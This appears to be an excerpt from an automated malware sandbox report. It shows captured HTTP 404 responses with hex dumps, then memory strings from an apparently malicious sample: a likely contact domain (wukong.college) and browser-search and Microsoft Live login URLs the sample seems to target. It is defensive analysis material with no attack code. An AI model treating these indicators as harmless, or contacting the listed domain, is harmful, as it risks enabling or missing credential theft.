                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 07:53:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 07:53:14 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 07:53:20 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 07:53:22 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 07:53:25 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 07:53:28 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 07:53:35 GMTServer: Apache/2.4.25 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 07:53:42 GMTServer: Apache/2.4.25 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 07:54:31 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 179Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00 Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 07:54:33 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 179Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00 Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 07:54:36 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 179Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00 Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 07:54:38 GMTServer: ApacheVary: Accept-EncodingContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 65 7a 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9ezc/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 07:54:42 GMTServer: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>
                Source: aSgPuBFuPS.exe, 00000005.00000002.3508624715.0000000005957000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wukong.college
                Source: aSgPuBFuPS.exe, 00000005.00000002.3508624715.0000000005957000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wukong.college/9ezc/
                Source: net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: net.exe, 00000003.00000003.2001995076.0000000007D7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: net.exe, 00000003.00000002.3506249546.0000000000E3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: net.exe, 00000003.00000002.3506249546.0000000000E3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: net.exe, 00000003.00000002.3506249546.0000000000E3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
